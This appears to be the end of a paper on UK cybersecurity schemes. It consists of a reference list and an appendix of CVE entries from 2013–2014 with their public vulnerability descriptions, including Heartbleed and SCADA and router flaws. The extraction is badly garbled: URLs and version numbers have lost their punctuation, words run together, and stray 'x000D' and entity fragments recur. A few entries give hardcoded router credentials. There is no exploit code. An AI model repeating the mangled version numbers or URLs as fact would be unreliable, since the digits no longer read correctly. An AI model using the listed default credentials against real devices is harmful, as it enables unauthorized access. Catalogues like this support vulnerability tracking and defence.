[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013

[5] CREST Cyber essentialscertified companies http

wwwcyberessentialsorglistMarch 2015

[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout

terminologyhtml

[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov

essentials-scheme-overview

[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https

wwwgovukgovernmentuploads

systemuploadsattachment_data

file400106Common_Cyber_Attacks-

Reducing_The_Impactpdf January2015

[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum

comindexphpcyber-security-

clustersnorth-west-lsquo-cluster2015

[10] HM Government Cyber essentialscertified companies https

file400914bis-15-72-cyber-

essentials-scheme-assurance-

frameworkpdf January 2015

[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus

enproduct_securitysuperfish_

uninstall

[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg

cgi-bincvenamecginame=CVE-

2014-0160 2014

[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg

2014-6271 2014

[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin

cvenamecginame=CVE-2015-20772015

[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom

archives20140408half-a-

million-widely-trusted-websites-

vulnerable-to-heartbleed-

bughtml April 2014

[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https

file60961uk-cyber-security-

strategy-finalpdf November 2011

[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov

ukgovernmentnewsgovernment-

mandates-new-cyber-security-

standard-for-suppliers September2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

CVE DetailsCVE-2013-0008

rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo

CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo

CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo

CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel

CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795

CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute

CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request

CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors

CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack

CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token

CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception

CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users

CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623

CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013

CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644

and CVE-2013-1374

CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection

CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content

CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call

CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors

CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site

CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743

CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093

CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055

CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676

CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389

CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo

CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386

CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors

CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd

CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU

CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect

confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity

CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169

CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function

CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document

CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors

CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors

CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location

CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action

CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject

CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate

CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors

CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897

CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation

CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671

CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341

CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)

CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack

CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D

Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet

CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130

CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring

CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter

CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo

CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo

CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo

CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo

CVE-2013-3206

rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo

CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash

CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724

CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262

CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter

CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL

CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo

CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo

CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll

CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in

Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo

CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo

CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo

CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile

CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack

CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment

CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image

CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors

CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem

CVE-2013-4782

The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password

CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo

CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service

CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors

CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors

CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674

CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975

CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521

CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139

CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622

CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors

CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx

CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement

CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse

CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors

CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo

CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate

CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow

CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site

CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880

CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902

CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227

CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network

CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username

CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic

CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp

CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle

MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring

CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network

CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug

CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file

CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo

CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo

CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo

CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo

CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request

CVE-2014-0362Cross-site scripting (XSS) vulnerability

on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element

CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling

